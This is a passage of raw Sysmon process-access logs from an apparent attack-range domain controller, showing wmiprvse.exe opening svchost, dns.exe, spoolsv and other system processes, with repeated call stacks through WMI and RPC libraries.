|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204291Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204290Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5B00-00000000AD01}3492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204289Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204288Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3400-00000000AD01}2960C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204287Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3300-00000000AD01}2668C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204286Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204285Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204284Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2F00-00000000AD01}2420C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204283Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204282Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2D00-00000000AD01}2308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204281Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204280Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2B00-00000000AD01}2540C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204279Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204278Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2700-00000000AD01}3004C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204277Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8439-603E-2500-00000000AD01}2856C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204276Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8430-603E-1800-00000000AD01}1928C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204275Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1700-00000000AD01}1452C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204274Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204273Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204272Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1400-00000000AD01}1096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|